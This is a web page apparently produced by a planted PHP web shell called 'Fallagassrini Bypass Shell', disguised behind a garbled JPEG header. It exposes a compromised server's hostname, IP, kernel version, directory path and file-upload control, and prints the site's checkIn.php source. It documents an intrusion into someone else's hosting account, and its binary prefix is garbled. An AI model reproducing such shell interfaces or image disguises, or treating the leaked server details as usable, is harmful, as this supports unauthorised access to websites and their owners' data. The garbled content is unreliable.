JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/checkIn.php

<?php
   require('includes/common.php');
   	include_once $config['SiteClassPath']."class.split_page_results.php";
	include_once $config['SiteClassPath']."class.Staff.php";
  //	include_once $config['SiteClassPath']."class.shop_detail.php";
	include_once $config['SiteClassPath']."class.headerclass.php";


	//$objshop_detail	= new shop_detail();
  $Objheaderclass	= new headerclass();
	$objStaff		= new Staff();
	$objStaff->chkSLogin($objArray);

	
//	$Objheaderclass->profile_checkin();

	if(isset($_POST['f_date']))
	     {
			//  echo "hi";exit;
	       $Objheaderclass ->profile_checkin($_POST);
		 }
	
		 //$Objheaderclass->CheckOutList();

  $objSmarty->assign('IncludeTpl', 'checkIn.tpl');
  $objSmarty->assign('OverallSiteTitle', $config['SiteTitle'].' -::-Aura -::- SCADA');
  $objSmarty->assign('document-state','dynamic');
  $objSmarty->assign('address',$config['SiteGlobalPath']);
 	$objSmarty->assign('address','http://www.tasca.in');
  

            $objSmarty->assign('IncludeCSS',
			
                    '<link rel="stylesheet" href="http://www.atlasestateagents.co.uk/css/tether.min.css">'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/bootstrap/bootstrap.min.css" type="text/css" media="all"/>'. "\n" .
			        '<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/font-awesome.min.css" type="text/css" media="all"/>'. "\n" .
			        '<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/animate.css" type="text/css" media="all"/>'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/icomoon.css" type="text/css" media="all"/>'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/main.css" type="text/css" media="all"/>'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/color-1.css" type="text/css" media="all"/>'. "\n".
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'style.css" type="text/css" media="all"/>'. "\n".
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/responsive.css" type="text/css" media="all"/>'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . 'css/transition.css" type="text/css" media="all"/>'. "\n" .
		'<link  rel="stylesheet" href="https://fonts.googleapis.com/css?family=Merriweather:300,300italic,400italic,400,700,700italic,900,900italic" type="text/css">'. "\n" .
        '<link  rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:400,300,300italic,400italic,700,700italic,900italic,900,100italic,100" type="text/css">'. "\n" .
					'<link rel="stylesheet" href="' . $config['SiteGlobalPath'] . './switcher/switcher.css" type="text/css" media="all"/>'. "\n" .
					'<link rel="stylesheet" id="skins" href="' . $config['SiteGlobalPath'] . 'css/default.css" type="text/css" media="all"/>' );
			
            $objSmarty->assign('IncludeJS', 
			
					'<script src="'. $config['SiteGlobalPath'] . 'js/vendor/bootstrap.min.js" type="text/javascript"></script>'. "\n" . 
                    '<script src="http://maps.google.com/maps/api/js?sensor=false" type="text/javascript"></script>'. "\n" . 
                    '<script src="'. $config['SiteGlobalPath'] . 'js/gmap3.min.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/datepicker.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/contact-form.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/bigslide.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/3d-book-showcase.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/turn.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/jquery-ui.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/mcustom-scrollbar.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/timeliner.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/parallax.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/countdown.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/countTo.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/owl-carousel.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/bxslider.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/appear.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/sticky.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/prettyPhoto.js" type="text/javascript"></script>'. "\n" . 
                    '<script src="'. $config['SiteGlobalPath'] . 'js/isotope.pkgd.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/wow-min.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/classie.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/main.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . 'js/vendor/modernizr.js" type="text/javascript"></script>'. "\n" . 
					'<script src="'. $config['SiteGlobalPath'] . './switcher/cookie.js" type="text/javascript"></script>'. "\n" . 
					'<script src="http://www.atlasestateagents.co.uk/javascript/tether.min.js"></script>'. "\n" .
					'<script src="'. $config['SiteGlobalPath'] . 'js/vendor/jquery.js" type="text/javascript"></script>'. "\n" .        
					'<script src="'. $config['SiteGlobalPath'] . './switcher/colorswitcher.js" type="text/javascript"></script>');
							 
							   
							   
			 /*Display page*/
  $objSmarty->assign('HeaderTpl', 'header.tpl');
  $objSmarty->assign('FooterTpl', 'footer.tpl');
  
  $objSmarty->display('pagetemplate.tpl');
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net